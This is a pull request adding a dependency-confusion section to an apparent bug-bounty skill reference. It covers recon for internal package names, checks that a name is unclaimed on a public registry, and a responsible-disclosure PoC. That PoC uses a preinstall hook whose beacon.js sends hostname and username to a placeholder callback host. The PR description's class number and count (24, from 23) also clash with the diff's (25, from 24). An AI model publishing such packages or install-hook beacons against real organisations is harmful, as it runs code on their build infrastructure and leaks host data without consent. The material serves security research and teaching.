### PR TITLE
feat(web2-vuln-classes): add dependency confusion / supply chain class

### DIFF
--- a/skills/web2-vuln-classes/SKILL.md
+++ b/skills/web2-vuln-classes/SKILL.md
@@ -1,9 +1,9 @@
 ---
 name: web2-vuln-classes
-description: Complete reference for 24 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates), CSS injection (attribute-selector exfiltration, opacity clickjacking, @import). LFI / file inclusion -> RCE (php://filter source disclosure, iconv filter-chain RCE with no upload, log/environ poisoning, .user.ini/.htaccess auto_prepend, data:// + expect:// wrappers, session inclusion, traversal bypass table). Insecure deserialization (PHP __wakeup bypass / phar:// POP chains, Java ysoserial CommonsCollections gadgets + magic bytes, Python pickle __reduce__ + signed-cookie forgery, Node node-serialize). Use when hunting a specific vuln class or studying what makes bugs pay.
+description: Complete reference for 25 web2 bug classes with root causes, detection patterns, bypass tables, exploit techniques, and real paid examples. Covers IDOR, auth bypass, XSS, SSRF (11 IP bypass techniques), SQLi, business logic, race conditions, OAuth/OIDC, file upload (10 bypass techniques), GraphQL, LLM/AI (ASI01-ASI10 agentic framework), API misconfig (mass assignment, JWT attacks, prototype pollution, CORS), ATO taxonomy (9 paths), SSTI (Jinja2/Twig/Freemarker/ERB/Spring), subdomain takeover, cloud/infra misconfigs, HTTP smuggling (CL.TE/TE.CL/H2.CL), cache poisoning, MFA bypass (7 patterns), SAML attacks (XSW/comment injection/signature stripping), error disclosure / debug endpoints (stack trace regex per framework, chain templates), CSS injection (attribute-selector exfiltration, opacity clickjacking, @import). LFI / file inclusion -> RCE (php://filter source disclosure, iconv filter-chain RCE with no upload, log/environ poisoning, .user.ini/.htaccess auto_prepend, data:// + expect:// wrappers, session inclusion, traversal bypass table). Insecure deserialization (PHP __wakeup bypass / phar:// POP chains, Java ysoserial CommonsCollections gadgets + magic bytes, Python pickle __reduce__ + signed-cookie forgery, Node node-serialize). Dependency confusion / supply chain (internal package-name discovery, unclaimed-name confirmation, callback-only PoC, npm/pip/Maven/RubyGems variants). Use when hunting a specific vuln class or studying what makes bugs pay.
 ---
 
-# WEB2 BUG CLASSES — 24 Classes
+# WEB2 BUG CLASSES — 25 Classes
 
 Root cause, pattern, bypass table, chaining opportunity, real paid examples.
 
@@ -1563,3 +1563,165 @@ __wakeup-bypassed PHP object reaching __toString file read (no command exec)    
 Deserialization sink confirmed but NO gadget on classpath / blind w/ no OOB proof  N/A — not submittable until you land code exec or OOB callback
 ```
 > Deserialization is one of the few classes where a single request is plausibly Critical — but **only with a working PoC**. A `rO0AB` blob or an `unserialize()` grep hit with no demonstrated gadget execution is N/A. Land OOB (Collaborator/interactsh callback) or command output, or kill it. Where the encrypted blob also leaks a padding oracle, see the Padding Oracle & Crypto Misuse class for the ViewState/forge-the-blob path.
+## 25. DEPENDENCY CONFUSION / SUPPLY CHAIN  📦
+
+> When an org's build pulls from **both** a private registry and the public one, an attacker who publishes a public package with the **same name + a higher version** can get their code executed inside the org's CI/dev machines. Alex Birsan's 2021 research made **$130k+ across 35 companies** (Apple, Microsoft, PayPal, Netflix, Uber, Tesla) this way — and it is still live: Microsoft Security documented 33 malicious npm packages abusing it in May 2026.
+>
+> **The entire bug is "can your code RIGHT NOW execute on their infra?"** — a DNS/HTTP callback from their network is the proof. No callback = no bug. This class has the hardest ethical line in the skill: **PoC fires a callback ONLY, never a real payload.**
+
+### Root Cause
+The package-manager resolver prefers **highest version across all configured registries** instead of pinning name→registry origin.
+
+```bash
+# VULNERABLE — internal pkg "acme-auth-utils" lives only on the private registry,
+# but the resolver also checks public npm. Attacker publishes acme-auth-utils@99.0.0
+# to public npm → resolver sees 99.0.0 > internal 1.4.2 → installs the attacker's.
+npm install            # no scope, no lockfile pin, registry fallback enabled
+
+# SECURE — scoped name bound to a registry; attacker can't publish under the scope
+# @acme/auth-utils  +  .npmrc: @acme:registry=https://npm.internal.acme.com
+# pip: --require-hashes   Maven: <checksumPolicy>fail</checksumPolicy>   Go: committed go.sum + -mod=readonly
+```
+
+### Detection — Step 1: harvest internal package names
+The whole attack starts with a name the org uses internally but hasn't reserved publicly. Where they leak:
+
+```bash
+# (1) Leaked package.json / lockfiles in public GitHub repos & gists
+# GitHub code search (web or gh): find dependency blocks referencing the org
+#   "dependencies" "acme-" filename:package.json
+#   filename:package-lock.json acme       filename:yarn.lock @acme
+#   filename:requirements.txt acme        filename:Gemfile acme   filename:pom.xml acme
+
+# (2) JS bundles on the org's own sites — the most reliable source (recon already has these)
+#     require('internal-pkg') / import survives bundling; webpack chunk comments leak names
+grep -rhoE "require\(['\"][@a-z0-9._/-]+['\"]\)" recon/$TARGET/js/ | sort -u
+grep -rhoE "from ['\"]@[a-z0-9-]+/[a-z0-9._-]+['\"]" recon/$TARGET/js/ | sort -u   # scoped imports
+# Webpack/Vite source maps map minified back to original module paths:
+grep -rhoE '"[@a-z0-9._/-]+"' recon/$TARGET/js/*.map 2>/dev/null | grep -iE "$ORGKEYWORD" | sort -u
+
+# (3) .npmrc / .pip.conf / .gemrc / settings.xml referencing an internal registry host
+#     (these confirm a private registry EXISTS — i.e. the fallback condition is plausible)
+grep -rniE "registry=|index-url|@[a-z]+:registry|nexus|artifactory|verdaccio|packagecloud" recon/$TARGET/
+
+# (4) Error messages / 404s — an internal registry 404 or a stack trace naming a module
+#     "Cannot find module 'acme-internal-sdk'"  /  "No matching distribution found for acme-..."
+```
+
+```
+Other leak spots worth a look:
+  Dockerfile / docker-compose       COPY .npmrc, RUN npm i acme-internal
+  CI configs                        .github/workflows/*.yml, .gitlab-ci.yml, Jenkinsfile (npm/pip install lines)
+  Public Postman/Swagger/SDK docs   sample "npm install @acme/..." snippets
+  source-map module paths           webpack:///./node_modules/acme-... in *.js.map
+```
+
+### Detection — Step 2: confirm the name is UNCLAIMED on the public registry
+This is the **kill switch**. If the public registry already serves that name, it's N/A — either the org owns it (safe) or someone else does (out of your hands).
+
+```bash
+# npm  — 404 / "is not in this registry" = claimable; any result = STOP, already taken
+npm view acme-auth-utils            # E404 → unclaimed
+# pip  — no matching distribution = claimable
+pip index versions acme-internal-sdk 2>&1 | grep -i "no matching\|not found"
+# RubyGems
+gem list -r acme_internal           # empty = claimable
+# Maven Central — check the groupId/artifactId path resolves
+curl -s -o /dev/null -w "%{http_code}\n" \
+  "https://repo1.maven.org/maven2/com/acme/internal-lib/"   # 404 = not on Central
+```
+
+> **Only proceed if BOTH are true: (a) name is used internally, (b) name is unclaimed on the public registry the org's build can reach.** Speculative "they might pull from public" with no evidence the build does so is N/A on most programs.
+
+### The Responsible-Disclosure PoC — CALLBACK ONLY, NEVER A PAYLOAD
+Publish a **benign placeholder** whose only job is to fire a DNS/HTTP beacon proving execution on the org's infra. This is the single most important boundary in this skill.
+
+```json
+// package.json — npm. The scripts hook runs on `npm install`.
+{
+  "name": "acme-auth-utils",
+  "version": "99.0.0",                 // higher than internal so the resolver prefers it
+  "description": "bug bounty PoC placeholder — contact security@yourhandle, see README",
+  "scripts": {
+    "preinstall": "node beacon.js"     // preinstall fires even if install later aborts
+  }
+}
+```
+
+```js
+// beacon.js — the ONLY thing it does: one DNS/HTTP callback proving "code ran here".
+// PERMITTED: hostname + whoami + cwd, ONLY to prove a real corporate host (not a registry
+// scanner) ran it, and ONLY if the program's policy doesn't forbid host metadata.
+// FORBIDDEN: reverse shell, reading files, dumping env/secrets, persistence, lateral movement,
+//            anything beyond proving execution. A real payload turns a bounty into a CFAA problem.
+const os = require('os');
+const id = `${os.hostname()}.${require('os').userInfo().username}`.replace(/[^a-z0-9.-]/gi,'-');
+// DNS callback — survives egress-filtered corp networks (Birsan's choice). Use a logging DNS host:
+require('dns').lookup(`${id}.YOURID.oast.fun`, () => {});      // interactsh / Burp Collaborator / dnsbin
+// Optional HTTP callback as a second signal (only if egress allows):
+try { require('https').get(`https://YOURID.oast.fun/?h=${id}`, () => {}); } catch (e) {}
+```
+
+```bash
+# Publish, then WAIT for a callback from THEIR network. Do not report before it fires.
+npm publish                          # PyPI: python -m build && twine upload ; gem build && gem push
+# When a hit lands, confirm it's the TARGET, not an automated registry scanner:
+#   - ARIN/whois the source IP → does it belong to the org / their cloud account?
+#   - hostname pattern matches their naming? cwd looks like a CI runner / dev box?
+# Then UNPUBLISH / deprecate immediately and report. Leaving a higher version live is a DoS.
+npm unpublish acme-auth-utils@99.0.0
+```
+
+> **Submission rule:** a confirmed callback **from the target's infrastructure** = real RCE-class impact, payable. A callback only from npm's/PyPI's own crawler infra = N/A false positive. No callback at all = N/A. Many hunters report prematurely and get closed Informative; wait for the genuine hit.
+
+### Variants by ecosystem
+
+| Ecosystem | Execution hook | Where names leak | Confirm unclaimed |
+|---|---|---|---|
+| **npm / yarn / pnpm** | `preinstall`/`postinstall` script | `package.json`, lockfiles, JS bundle `require()`, `.npmrc` | `npm view <name>` → E404 |
+| **pip / PyPI** | `setup.py` runs on install (`cmdclass`/`install`) | `requirements.txt`, `setup.py`, `pyproject.toml`, `.pip/pip.conf` `index-url` | `pip index versions <name>` |
+| **Maven / Gradle** | no install hook — confusion = build pulls poisoned artifact | `pom.xml` groupId/artifactId, `settings.xml` (Nexus/Artifactory repo) | Maven Central path 404 |
+| **RubyGems** | `extconf.rb` / gemspec native-ext build step | `Gemfile`, `*.gemspec`, `.gemrc` source list | `gem list -r <name>` empty |
+| **NuGet / Go** | NuGet: install scripts; Go: build-time only | `*.csproj`, `nuget.config`; `go.mod` (less exploitable — proxy + go.sum) | registry lookup 404 |
+
+> **Scoped-name nuance (npm):** `@acme/auth-utils` is NOT confusable unless the scope `@acme` is **unregistered** on public npm — then an attacker can register the scope and publish under it. Unscoped names (`acme-auth-utils`) are the classic, easier case. Check whether the scope itself is claimable.
+
+### Scope Caveats — what's submittable vs N/A
+```
+Confirmed callback FROM target infra (ARIN-verified)          = High/Critical (RCE-class) — submit
+Internal name unclaimed + private registry confirmed,         = Low/Info, often N/A — "speculative, no
+  but NO callback / can't prove their build pulls public         proof of execution" closes it
+Internal name already on public npm/PyPI (org or 3rd-party)   = N/A (not exploitable by you)
+Org pins all deps to scope/lockfile-with-integrity/hashes     = N/A (resolver can't be confused)
+Internal package NEVER published publicly + program says      = N/A (Facebook-style rejection: not in scope)
+  that's required
+Typosquat (similar name, not exact internal name)             = usually N/A on BBPs — low signal, treat as separate
+```
+
+> **Per-program reality:** Netflix marks shared-root-cause dep-confusion reports as Duplicate but accepts clear evidence of execution from infra. Facebook rejected a report where the internal package was never on npmjs.com. Always read the program's supply-chain policy before publishing anything — and never publish a package the program hasn't put package registries in scope for.
+
+### Real Paid Examples
+- **$130,000+** — Alex Birsan's 2021 research across 35 companies (Apple, Microsoft, PayPal, Netflix, Uber, Tesla, Yelp, Shopify); DNS-callback PoCs only, 200+ benign packages on npm/PyPI/RubyGems
+- **$5,000** — RCE via dependency confusion, callback proving execution (username/hostname/cwd), HackerOne writeup
+- **$2,500** — RCE via an unclaimed Node package pulled into a target's build (HackerOne writeup)
+- pattern seen on HackerOne — Sifchain disclosed dependency-confusion report (public disclosure #1187816)
+- Still active in 2026: Microsoft Security documented 33 malicious npm packages abusing dependency confusion to profile developer environments (May 2026) — proves the resolver flaw persists at scale
+
+### Chains That Pay
+```
+Leaked package.json on GitHub -> unclaimed name -> callback PoC fires from CI       Critical (RCE on build infra)
+JS bundle require('internal') -> unclaimed -> callback from dev laptop              High/Critical
+.npmrc internal-registry ref -> confirms fallback config -> confusion confirmed     supports the chain
+Callback proves exec -> (DO NOT escalate to real RCE) -> report exec proof only     Critical, stays ethical
+Internal name found but already public / fully pinned                               N/A — kill it, move on
+```
+
+### Triage
+```
+Callback fired from target-owned IP (ARIN-verified) + name was unclaimed   = Critical/High — RCE-class, submit
+Callback fired but only from registry-scanner IP                           = N/A (false positive)
+Name unclaimed + private registry config proven, no callback yet           = wait; premature report = Informative
+Name already claimed on public registry                                    = N/A (not exploitable)
+Deps fully scoped + lockfile integrity + hash-pinned                       = N/A (not confusable)
+Real payload used instead of a benign callback                             = STOP — do not submit, legal/ethical breach
+```


### PR DESCRIPTION
## What

Adds a new numbered bug class **24. DEPENDENCY CONFUSION / SUPPLY CHAIN** to `skills/web2-vuln-classes/SKILL.md`, and bumps the file title from "23 Classes" to "24 Classes".

The new class follows the existing house style (Root Cause → Detection → Variants → callback-only PoC → Real Paid Examples → Chains → Triage):

- **Finding internal/private package names** — leaked `package.json` / lockfiles on GitHub, `require('@org/internal-pkg')` strings scraped from public JS bundles, `.npmrc` / `.pip.conf` registry refs, error messages and `404 Not Found` from internal registries, source maps.
- **Confirming the name is unclaimed** on the public registry (`npm view`, `pip index`, RubyGems/Maven Central checks) — the kill switch: if the name is already taken, it is N/A.
- **The responsible-disclosure PoC** — publish a benign placeholder that fires a DNS/HTTP callback from a `preinstall`/`postinstall` hook to prove execution. Strong, repeated emphasis on **callback only, never a real payload** (no reverse shell, no file read, no env exfil beyond the minimal hostname/whoami needed to prove a real corporate host fired — and only where program policy allows). Includes ARIN/source-IP analysis to rule out registry-scanner false positives.
- **Per-ecosystem variants** — npm (postinstall + scoped-package nuance), pip/PyPI (`setup.py` execution), Maven (groupId/internal repo), RubyGems (`Gemfile`/`gemspec`), with cross-language notes documented by Snyk and SystemsHardening.
- **Scope caveats** — many programs treat speculative dep-confusion as **N/A without proof of execution**; some (e.g. Facebook) reject when the internal package was never published publicly; Netflix marks shared-root-cause reports Duplicate. Only valid when the org actually resolves from the public registry AND your callback fires from their infrastructure.

This change uses standard CLI tooling only — no new MCP dependency.

## Why

The skill had no supply-chain / dependency-confusion coverage despite it being a high-payout, low-dup class. Alex Birsan's original research paid **$130k+ across 35 companies** and the technique is still live — Microsoft Security documented 33 malicious npm packages abusing it in **May 2026**.

## References

- Alex Birsan, "Dependency Confusion" disclosure ($130k+ across 35 companies)
- Snyk and SystemsHardening cross-ecosystem dependency-confusion guidance
- Microsoft Security reporting (May 2026) on 33 malicious npm packages abusing the technique

No dollar figures or CVEs were fabricated.

## Merge order

Touches only `skills/web2-vuln-classes/SKILL.md`. If another in-flight PR also adds a numbered class to this file, the loser should renumber this to the next free integer and bump the "N Classes" header/frontmatter count accordingly (same convention used for prior class additions).
